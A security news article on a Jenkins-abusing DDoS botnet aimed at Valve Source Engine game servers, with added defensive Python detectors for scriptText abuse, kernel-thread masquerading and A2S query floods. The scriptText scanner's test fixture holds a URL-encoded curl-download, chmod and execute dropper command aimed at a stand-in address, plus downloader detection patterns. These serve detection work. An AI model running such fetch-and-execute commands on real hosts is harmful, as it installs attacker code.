A new DDoS botnet is abusing exposed Jenkins servers to launch powerful attacks against Valve Source Engine game infrastructure, including servers hosting titles like Counter‑Strike and Team Fortress 2.
The campaign shows how a single misconfigured CI server can be turned into a multi‑platform attack node capable of UDP, TCP, and application‑layer floods against online games.
Darktrace identified the activity through “CloudyPots,” its global honeypot network designed to emulate internet‑facing services across clouds and protocols to observe attacker behavior in real time.
Among these decoy services is Jenkins, a popular CI platform that in this case was intentionally deployed with a weak password to invite brute‑force and opportunistic compromise.
On March 18, 2026, a threat actor successfully authenticated to a Jenkins honeypot and attempted to deploy a new DDoS botnet that Darktrace later confirmed was tuned to attack online game servers.
Darktrace analysts observed attackers exploiting a Jenkins honeypot to deploy a new DDoS botnet targeting video game servers.
The activity underlines how even less frequently targeted services like Jenkins can still be swept up in broad botnet‑building campaigns.
Abusing Jenkins scriptText for RCE
The attackers leveraged Jenkins’ scriptText endpoint, which accepts Groovy scripts and executes them on the server, turning a CI feature into a remote code execution backdoor when exposed and weakly protected.
The malicious script was sent as form‑data and URL‑encoded, but analysts decoded it to reveal distinct branches for both Windows and Linux hosts.
On Windows, the script downloaded a payload from 103[.]177.110[.]202 to the Windows Temp directory, renamed it to a benign‑looking executable, removed internet download restrictions, and opened TCP port 5444 for command‑and‑control traffic.
On Linux, it used a Bash one‑liner to fetch a 64‑bit bot binary from the same IP into /tmp and execute it immediately, providing a fast, file‑light infection path.
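A defender-side check for the scriptText abuse described above, written for this article as an added example rather than code from Darktrace or Jenkins: it decodes a URL-encoded scriptText POST body and lists which staging indicators the Groovy script trips. The sample bodies and the 203.0.113.10 address are constructed test fixtures, and the example assumes the body is URL-encoded (multipart form-data is not parsed).

```python
import re
from urllib.parse import parse_qs

# Indicators drawn from the behaviour described above: spawn a process, stage a
# payload in a temp directory, fetch it with a downloader, mark it executable.
INDICATORS = [
    ("groovy_execute", re.compile(r"\.execute\(")),
    ("linux_tmp_path", re.compile(r"/tmp/")),
    ("windows_temp_path", re.compile(r"\\Temp\\|%TEMP%", re.I)),
    ("downloader", re.compile(r"\b(curl|wget|Invoke-WebRequest|DownloadFile)\b", re.I)),
    ("chmod_exec", re.compile(r"\bchmod\s+\+?x\b")),
]

def decode_script_body(body: str) -> str:
    """Return the Groovy source from a URL-encoded scriptText POST body."""
    return parse_qs(body).get("script", [""])[0]

def scan_request(method: str, path: str, body: str) -> dict:
    """Flag a script-console call and list which indicators its script trips."""
    is_console = method == "POST" and path.rstrip("/").endswith("/scriptText")
    hits = []
    if is_console:
        script = decode_script_body(body)
        hits = [name for name, pat in INDICATORS if pat.search(script)]
    return {"script_console": is_console, "hits": hits}

# Constructed sample bodies (not captured traffic); the IP is a TEST-NET address.
BENIGN_BODY = "script=println%28Jenkins.instance.getVersion%28%29%29"
DROPPER_BODY = ("script=%5B%22bash%22%2C%22-c%22%2C%22curl+-s+http%3A%2F%2F203.0.113.10"
                "%2Fbot+-o+%2Ftmp%2Fbot%3B+chmod+%2Bx+%2Ftmp%2Fbot%22%5D.execute%28%29")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("dropper", DROPPER_BODY)):
        print(label, scan_request("POST", "/scriptText", body))
```

Any POST to scriptText from outside an administrator allowlist is worth alerting on by itself; the indicator list only ranks which ones to look at first.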
Open‑source analysis linked 103[.]177.110[.]202 to Vietnamese hosting provider Webico (Tino brand), with multiple malicious associations observed against the address.
Darktrace found that the same IP was reused for initial access, payload delivery, and C2 communications, an unusually consolidated infrastructure design for a modern botnet.
Most malware families separate distribution and C2 infrastructure to avoid losing control of existing bots when noisy infection servers trigger abuse complaints and takedowns.
Here, the actor traded resilience for simplicity, increasing operational risk but reducing the overhead of managing multiple server tiers.
Once running on Linux, the bot sets Jenkins‑related environment variables to “dontKillMe” to bypass Jenkins’ normal timeout behavior for long‑lived tasks.
It then deletes its original binary, renames itself to mimic legitimate kernel worker processes like “ksoftirqd/0” or “kworker,” daemonizes via double fork, redirects I/O to /dev/null, and installs signal handlers to ignore termination attempts.
The malware then connects to its C2 server, reports the system architecture, and enters a command loop to receive instructions.

Supported commands include utility directives such as “PING” (keep‑alive), “!stop” (exit), and “!update” (self‑update from C2), alongside numerous attack commands that all accept an IP, port, and duration.
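The masquerading and Jenkins-timeout tricks above leave traces in /proc that a genuine kernel thread never has. The following host check is an added example written for this article, not Darktrace's tooling: it reads the fields from /proc on Linux (run as root to see every process) and reports a process that carries a kernel-thread name but has a backing executable, a command line, a non-kthreadd parent, a deleted binary, or a "dontKillMe" value in its environment. The assess() function takes a plain dict so the logic can be exercised on constructed snapshots.

```python
import os
import re

KERNEL_NAMES = re.compile(r"^(kworker|ksoftirqd|kthreadd|migration|rcu_)")  # names the bot borrows

def read_proc(pid: int) -> dict:
    """Snapshot the /proc fields the check needs (Linux; run as root)."""
    base = f"/proc/{pid}"
    with open(f"{base}/comm") as f:
        comm = f.read().strip()
    with open(f"{base}/status") as f:
        ppid = int(next(l for l in f if l.startswith("PPid:")).split()[1])
    with open(f"{base}/cmdline", "rb") as f:
        cmdline = f.read()
    with open(f"{base}/environ", "rb") as f:
        environ = f.read()
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:
        exe = None  # genuine kernel threads have no backing executable
    return {"pid": pid, "comm": comm, "ppid": ppid, "cmdline": cmdline,
            "exe": exe, "environ": environ}

def assess(proc: dict) -> list:
    """Findings that separate a masquerading bot from a real kernel thread."""
    findings = []
    if KERNEL_NAMES.match(proc["comm"]):
        # Real kernel threads: no exe link, empty argv, parent is kthreadd (pid 2).
        if proc["exe"] is not None or proc["cmdline"]:
            findings.append("kernel-thread name on a user-space process")
        if proc["ppid"] not in (0, 2):
            findings.append("not parented by kthreadd")
    if proc["exe"] and proc["exe"].endswith(" (deleted)"):
        findings.append("backing binary deleted after launch")
    values = [kv.split(b"=", 1)[-1] for kv in proc["environ"].split(b"\x00") if kv]
    if b"dontKillMe" in values:
        findings.append("Jenkins dontKillMe cookie set in environment")
    return findings

def scan_all() -> dict:
    """Walk /proc; return {pid: findings} for every process that trips a check."""
    results = {}
    for name in filter(str.isdigit, os.listdir("/proc")):
        try:
            findings = assess(read_proc(int(name)))
        except OSError:
            continue  # process exited or is not readable
        if findings:
            results[int(name)] = findings
    return results
```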
Game‑focused DDoS attack capabilities
The botnet supports multiple volumetric and application‑layer DDoS techniques, but several advertised modes map to the same underlying functions, suggesting either capability padding or placeholders for future features.

UDP floods are implemented via two functions: one saturates bandwidth with 1,450‑byte random packets, while another maximizes packets‑per‑second using 64‑byte payloads.
A dedicated function dubbed attack_dayz repeatedly sends Valve’s Source Engine Query packets, forcing game servers to generate disproportionately large responses and exhausting resources with relatively low attacker bandwidth.
Additional functions handle TCP push floods and high‑rate HTTP GET requests over non‑blocking, no‑delay sockets, as well as a “special” mode that targets DNS, NTP, and Valve Source Engine ports with crafted payloads.
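The attack_dayz mode described above is a query flood toward the game port, which is visible on the server side as one source sending far more A2S_INFO requests than any legitimate server browser would. The sliding-window detector below is an added example for this article, not code from Darktrace or Valve; the A2S_INFO header bytes are the public Source Engine query format, and the sample traffic with TEST-NET addresses is constructed.

```python
from collections import defaultdict, deque

A2S_INFO = b"\xff\xff\xff\xffTSource Engine Query\x00"   # Source Engine info query
GAME_PORT = 27015

class A2SFloodDetector:
    """Sliding-window rate check on A2S_INFO queries per source address."""

    def __init__(self, window_s: float = 1.0, max_per_window: int = 20):
        self.window = window_s
        self.limit = max_per_window
        self.recent = defaultdict(deque)   # src -> timestamps inside the window
        self.flagged = set()

    def observe(self, ts: float, src: str, dst_port: int, payload: bytes) -> bool:
        """Feed one UDP datagram; return True when src exceeds the query rate."""
        if dst_port != GAME_PORT or not payload.startswith(A2S_INFO):
            return False   # other traffic (game data, A2S_PLAYER, ...) is ignored
        q = self.recent[src]
        q.append(ts)
        while q and ts - q[0] > self.window:
            q.popleft()
        if len(q) > self.limit:
            self.flagged.add(src)
            return True
        return False

def replay(datagrams, **kwargs) -> set:
    """Run a list of (ts, src, dst_port, payload) tuples through the detector."""
    det = A2SFloodDetector(**kwargs)
    for d in sorted(datagrams, key=lambda d: d[0]):
        det.observe(*d)
    return det.flagged

# Constructed sample traffic (TEST-NET addresses): a browser refreshing three
# times, one non-A2S_INFO packet, and one host sending 100 queries in 0.2 s.
SAMPLE = (
    [(i * 0.5, "198.51.100.7", GAME_PORT, A2S_INFO) for i in range(3)]
    + [(0.1, "198.51.100.9", GAME_PORT, b"\xff\xff\xff\xffU\xff\xff\xff\xff")]
    + [(i * 0.002, "203.0.113.50", GAME_PORT, A2S_INFO) for i in range(100)]
)

if __name__ == "__main__":
    print("flood sources:", replay(SAMPLE))
```

Recent Source Engine builds answer A2S_INFO with a challenge before sending the full reply, which limits the amplification but not the query flood itself, so a per-source rate check or firewall rate limit on 27015 remains useful.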

Darktrace notes that Jenkins is less commonly abused than other exposed services in its honeypot fleet, but this case proves that any misconfigured, internet‑facing CI server can become valuable DDoS infrastructure.
For botnet operators, even “low‑value” hosts are useful, since overall attack power depends more on the number of bots than on their individual criticality.
The focus on game‑specific techniques aligns with broader trends, as gaming continues to rank among the top industries hit by DDoS attacks worldwide.
Operators of Valve Source Engine servers and other online games should harden hosting environments, implement DDoS protections on ports like 27015, and ensure CI tools such as Jenkins are never exposed with weak credentials.